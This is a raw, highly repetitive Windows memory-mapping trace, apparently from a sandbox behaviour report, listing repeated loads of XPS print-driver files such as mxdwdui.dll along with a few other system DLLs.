C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll write and read and execute commit 1F20000 761856 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unires.dll query and write and read and execute image 1F20000 765952 own pid read write conflicting addresses 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 1F00000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\prntvpt.dll write and read and execute commit 1F00000 118784 own pid execute success or wait 1
C:\WINDOWS\system32\prntvpt.dll query and write and read and execute image 3FB50000 131072 own pid read write success or wait 1
\BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_488 query and write and read reserve 2430000 4194304 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
